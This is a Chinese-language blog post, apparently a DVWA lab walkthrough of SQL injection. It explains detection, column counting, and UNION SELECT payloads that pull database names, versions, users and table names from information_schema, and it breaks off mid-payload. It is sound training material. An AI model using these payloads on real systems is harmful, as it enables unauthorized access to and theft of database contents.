DVWA—sql注入( SQL Injection)

本文详细介绍了DVWA中的SQL注入漏洞,包括原理、类型、判断注入方式、猜解SQL字段、获取数据库信息等步骤,并针对不同安全级别(low、medium、high)的防护措施进行了分析。
摘要由CSDN通过智能技术生成

DVWA—sql注入( SQL Injection)

原理

将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的。

类型

数字 字符 搜索

过程

1.判断是否存在注入,注入时字符型还是数字型

输入1,能够正常返回用户名和密码

在1后面加上’,报错,说明此处存在注入点。

接下来,判断字符型还是数字型,判断方法如下:

数字型

(1)在URL的注入点中输入 and 1=1,成功返回

​ 输入 and 1=2,依然成功返回,说明不是数字型,因为返回值没有受到数字的影响

(2)在URL或者表单中输入0 or 1,如果可以查到数据,说明是数字型注入

​ 同样地,依然查不到数据,确定不是数字型

字符型:
1’ and ‘1’='1

如果输入0’or 1#,查到数据说明是字符型注入

2.猜解SQL查询语句中的字段数
1’ order by 1 #

1’ order by 2 #

继续增加,加到3报错,说明这个表只有2列,也就是2个字段,可以看出有2个回显

3.确定显示位置/字段顺序

1’ union select 1,2 #

First name处显示结果位查询结果的第一列的值,surname处显示结果位查询结果第二列的值。

4.获取当前数据库及数据库版本、构造联合查询语句查询当前数据库用户和数据库名
1’ union select database(),version() #

image-20220606203259443

’ union select user(),database()#

image-20220606203433321

5.获取数据库中的表
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

image-20220606220541227

6.获取表中的字段名
1’ union select 1,group_concat(column_name) from information_schema.columns where table_

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

瑶~why

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值